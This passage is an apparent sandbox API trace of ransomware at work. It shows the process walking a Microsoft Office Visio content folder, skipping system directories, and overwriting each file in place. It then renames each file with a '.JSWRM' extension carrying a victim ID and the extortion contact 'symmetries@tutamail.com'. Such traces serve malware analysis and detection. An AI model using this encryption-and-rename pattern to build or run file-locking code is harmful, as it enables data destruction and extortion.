ftCreationTime.dwLowDateTime=0x3c69e3f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3c69e3f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3c69e3f, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x77bd5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CUBICL_M.VSSX", cAlternateFileName="CUBICL~4.VSS")) returned 1 [0146.819] lstrcmpiW (lpString1="CUBICL_M.VSSX", lpString2=".") returned 1 [0146.819] lstrcmpiW (lpString1="CUBICL_M.VSSX", lpString2="..") returned 1 [0146.819] lstrcmpiW (lpString1="CUBICL_M.VSSX", lpString2="...") returned 1 [0146.819] lstrcmpiW (lpString1="CUBICL_M.VSSX", lpString2="windows") returned -1 [0146.819] lstrcmpiW (lpString1="CUBICL_M.VSSX", lpString2="recovery") returned -1 [0146.819] lstrcmpiW (lpString1="CUBICL_M.VSSX", lpString2="perflogs") returned -1 [0146.819] lstrcmpiW (lpString1="CUBICL_M.VSSX", lpString2="documents and settings") returned -1 [0146.819] lstrcmpiW (lpString1="CUBICL_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.819] lstrcmpiW (lpString1="CUBICL_M.VSSX", lpString2="system volume information") returned -1 [0146.819] lstrcmpiW (lpString1="CUBICL_M.VSSX", lpString2="msocache") returned -1 [0146.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CUBICL_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CUBICL_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CUBICL_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cubicl_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.820] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=490453) returned 1 [0146.820] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.821] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0146.840] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.840] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0146.841] CloseHandle (hObject=0x314) returned 1 [0146.841] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CUBICL_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cubicl_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CUBICL_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cubicl_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.842] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3352f3e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3352f3e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3352f3e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x73f11, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CUBICL_U.VSSX", cAlternateFileName="CUBICL~3.VSS")) returned 1 [0146.842] lstrcmpiW (lpString1="CUBICL_U.VSSX", lpString2=".") returned 1 [0146.842] lstrcmpiW (lpString1="CUBICL_U.VSSX", lpString2="..") returned 1 [0146.842] lstrcmpiW (lpString1="CUBICL_U.VSSX", lpString2="...") returned 1 [0146.842] lstrcmpiW (lpString1="CUBICL_U.VSSX", lpString2="windows") returned -1 [0146.842] lstrcmpiW (lpString1="CUBICL_U.VSSX", lpString2="recovery") returned -1 [0146.842] lstrcmpiW (lpString1="CUBICL_U.VSSX", lpString2="perflogs") returned -1 [0146.842] lstrcmpiW (lpString1="CUBICL_U.VSSX", lpString2="documents and settings") returned -1 [0146.842] lstrcmpiW (lpString1="CUBICL_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.842] lstrcmpiW (lpString1="CUBICL_U.VSSX", lpString2="system volume information") returned -1 [0146.842] lstrcmpiW (lpString1="CUBICL_U.VSSX", lpString2="msocache") returned -1 [0146.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CUBICL_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CUBICL_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CUBICL_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cubicl_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.843] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=474897) returned 1 [0146.843] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.843] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0146.856] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.856] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0146.856] CloseHandle (hObject=0x314) returned 1 [0146.856] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CUBICL_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cubicl_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CUBICL_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cubicl_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.857] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1ba18c4, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1ba18c4, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1bc7b4a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4326a, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CUBICL_VISIO2013_M.VSSX", cAlternateFileName="CUBICL~2.VSS")) returned 1 [0146.858] lstrcmpiW (lpString1="CUBICL_VISIO2013_M.VSSX", lpString2=".") returned 1 [0146.858] lstrcmpiW (lpString1="CUBICL_VISIO2013_M.VSSX", lpString2="..") returned 1 [0146.858] lstrcmpiW (lpString1="CUBICL_VISIO2013_M.VSSX", lpString2="...") returned 1 [0146.858] lstrcmpiW (lpString1="CUBICL_VISIO2013_M.VSSX", lpString2="windows") returned -1 [0146.858] lstrcmpiW (lpString1="CUBICL_VISIO2013_M.VSSX", lpString2="recovery") returned -1 [0146.858] lstrcmpiW (lpString1="CUBICL_VISIO2013_M.VSSX", lpString2="perflogs") returned -1 [0146.858] lstrcmpiW (lpString1="CUBICL_VISIO2013_M.VSSX", lpString2="documents and settings") returned -1 [0146.858] lstrcmpiW (lpString1="CUBICL_VISIO2013_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.858] lstrcmpiW (lpString1="CUBICL_VISIO2013_M.VSSX", lpString2="system volume information") returned -1 [0146.858] lstrcmpiW (lpString1="CUBICL_VISIO2013_M.VSSX", lpString2="msocache") returned -1 [0146.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0146.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x240ef8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CUBICL_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0146.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0146.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CUBICL_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0146.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CUBICL_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cubicl_visio2013_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.859] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=275050) returned 1 [0146.859] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.859] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0146.871] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.871] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0146.871] CloseHandle (hObject=0x314) returned 1 [0146.871] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CUBICL_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cubicl_visio2013_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CUBICL_VISIO2013_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cubicl_visio2013_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.872] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1abcabc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1abcabc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1abcabc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x42edc, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CUBICL_VISIO2013_U.VSSX", cAlternateFileName="CUBICL~1.VSS")) returned 1 [0146.872] lstrcmpiW (lpString1="CUBICL_VISIO2013_U.VSSX", lpString2=".") returned 1 [0146.872] lstrcmpiW (lpString1="CUBICL_VISIO2013_U.VSSX", lpString2="..") returned 1 [0146.873] lstrcmpiW (lpString1="CUBICL_VISIO2013_U.VSSX", lpString2="...") returned 1 [0146.873] lstrcmpiW (lpString1="CUBICL_VISIO2013_U.VSSX", lpString2="windows") returned -1 [0146.873] lstrcmpiW (lpString1="CUBICL_VISIO2013_U.VSSX", lpString2="recovery") returned -1 [0146.873] lstrcmpiW (lpString1="CUBICL_VISIO2013_U.VSSX", lpString2="perflogs") returned -1 [0146.873] lstrcmpiW (lpString1="CUBICL_VISIO2013_U.VSSX", lpString2="documents and settings") returned -1 [0146.873] lstrcmpiW (lpString1="CUBICL_VISIO2013_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.873] lstrcmpiW (lpString1="CUBICL_VISIO2013_U.VSSX", lpString2="system volume information") returned -1 [0146.873] lstrcmpiW (lpString1="CUBICL_VISIO2013_U.VSSX", lpString2="msocache") returned -1 [0146.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0146.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x241038, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CUBICL_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0146.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0146.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CUBICL_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CUBICL_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0146.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CUBICL_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cubicl_visio2013_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.943] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=274140) returned 1 [0146.943] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.943] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0147.000] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.000] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0147.000] CloseHandle (hObject=0x314) returned 1 [0147.000] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CUBICL_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cubicl_visio2013_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CUBICL_VISIO2013_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cubicl_visio2013_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.003] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2fe590a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x2fe590a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x2fe590a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xe3e4, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DATFLO_M.VSSX", cAlternateFileName="DATFLO~2.VSS")) returned 1 [0147.003] lstrcmpiW (lpString1="DATFLO_M.VSSX", lpString2=".") returned 1 [0147.003] lstrcmpiW (lpString1="DATFLO_M.VSSX", lpString2="..") returned 1 [0147.003] lstrcmpiW (lpString1="DATFLO_M.VSSX", lpString2="...") returned 1 [0147.003] lstrcmpiW (lpString1="DATFLO_M.VSSX", lpString2="windows") returned -1 [0147.003] lstrcmpiW (lpString1="DATFLO_M.VSSX", lpString2="recovery") returned -1 [0147.003] lstrcmpiW (lpString1="DATFLO_M.VSSX", lpString2="perflogs") returned -1 [0147.003] lstrcmpiW (lpString1="DATFLO_M.VSSX", lpString2="documents and settings") returned -1 [0147.003] lstrcmpiW (lpString1="DATFLO_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.003] lstrcmpiW (lpString1="DATFLO_M.VSSX", lpString2="system volume information") returned -1 [0147.003] lstrcmpiW (lpString1="DATFLO_M.VSSX", lpString2="msocache") returned -1 [0147.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATFLO_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DATFLO_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATFLO_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATFLO_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datflo_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.005] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=58340) returned 1 [0147.006] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.006] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe3e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xe3e0, lpOverlapped=0x0) returned 1 [0147.012] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.012] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe3e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xe3e0, lpOverlapped=0x0) returned 1 [0147.013] CloseHandle (hObject=0x314) returned 1 [0147.013] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATFLO_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datflo_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DATFLO_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\datflo_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.014] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c5b962, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4c5b962, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4c5b962, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4c89, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DATFLO_M.VSTX", cAlternateFileName="DATFLO~2.VST")) returned 1 [0147.014] lstrcmpiW (lpString1="DATFLO_M.VSTX", lpString2=".") returned 1 [0147.014] lstrcmpiW (lpString1="DATFLO_M.VSTX", lpString2="..") 